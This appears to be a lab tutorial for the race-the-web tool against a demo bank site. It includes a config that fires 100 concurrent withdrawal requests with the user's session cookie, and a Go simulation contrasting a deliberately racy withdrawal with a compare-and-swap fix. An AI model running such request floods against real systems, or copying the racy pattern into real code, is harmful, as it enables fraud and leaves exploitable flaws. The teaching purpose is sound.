- Click “Initialize” to initialize a bank account with $10,000.
- Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
- Repeat the request with race-the-web. Your config file should look like the following:
```toml
# Send the request 100 times
count = 100
verbose = true
method = "POST"
url = "http://racetheweb.io/bank/withdraw"
# Withdraw 1 dollar per request
body = "amount=1"
# Insert your sessionId cookie below.
cookies = ["sessionId=<insert here>"]
redirects = false
```
- Visit the bank page again in your browser to view your updated balance. The balance should be $100 less ($1 * 100 requests) than it was after your first manual withdrawal. Because of the race condition flaw in the application, however, the balance will be much higher than that, even though the bank dispensed the money on every one of the withdrawals.
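The mechanism behind that inflated balance, as an added Go simulation that is not code from race-the-web or the demo bank: each request reads the balance and later writes back "balance minus amount", so concurrent requests overwrite each other's debits (a lost update), while the safe variant commits the debit only if the balance is still the value it checked. The names WithdrawRacy, WithdrawSafe and Hammer are constructed for this example.

```go
package main

import (
	"sync"
	"sync/atomic"
	"time"
)

// WithdrawRacy reads the balance and later writes back balance-amount. Requests
// that all read 10000 all write 9999, so only one is ever debited (lost update).
func WithdrawRacy(balance *int64, amount int64) bool {
	b := atomic.LoadInt64(balance) // time of check
	if b < amount {
		return false
	}
	time.Sleep(time.Millisecond)         // stands in for the DB round-trip
	atomic.StoreInt64(balance, b-amount) // time of use, with a stale b
	return true
}

// WithdrawSafe makes check and debit one atomic step: the new balance is only
// committed if nobody changed it since the read. The DB analogue is a
// conditional UPDATE ... SET balance = balance - ? WHERE balance >= ?.
func WithdrawSafe(balance *int64, amount int64) bool {
	for {
		b := atomic.LoadInt64(balance)
		if b < amount {
			return false
		}
		if atomic.CompareAndSwapInt64(balance, b, b-amount) {
			return true // nobody raced us; otherwise retry with a fresh read
		}
	}
}

// Hammer fires n concurrent withdrawals (race-the-web's count setting) and
// returns the cash dispensed and the balance left afterwards.
func Hammer(balance *int64, n int, amount int64, withdraw func(*int64, int64) bool) (dispensed, final int64) {
	var wg sync.WaitGroup
	wg.Add(n)
	for i := 0; i < n; i++ {
		go func() {
			defer wg.Done()
			if withdraw(balance, amount) {
				atomic.AddInt64(&dispensed, amount)
			}
		}()
	}
	wg.Wait()
	return dispensed, atomic.LoadInt64(balance)
}
```

Driving it with a constructed balance of 10000 and Hammer(&balance, 100, 1, WithdrawRacy) dispenses $100 but leaves the balance near 9999, whereas WithdrawSafe leaves exactly 9900.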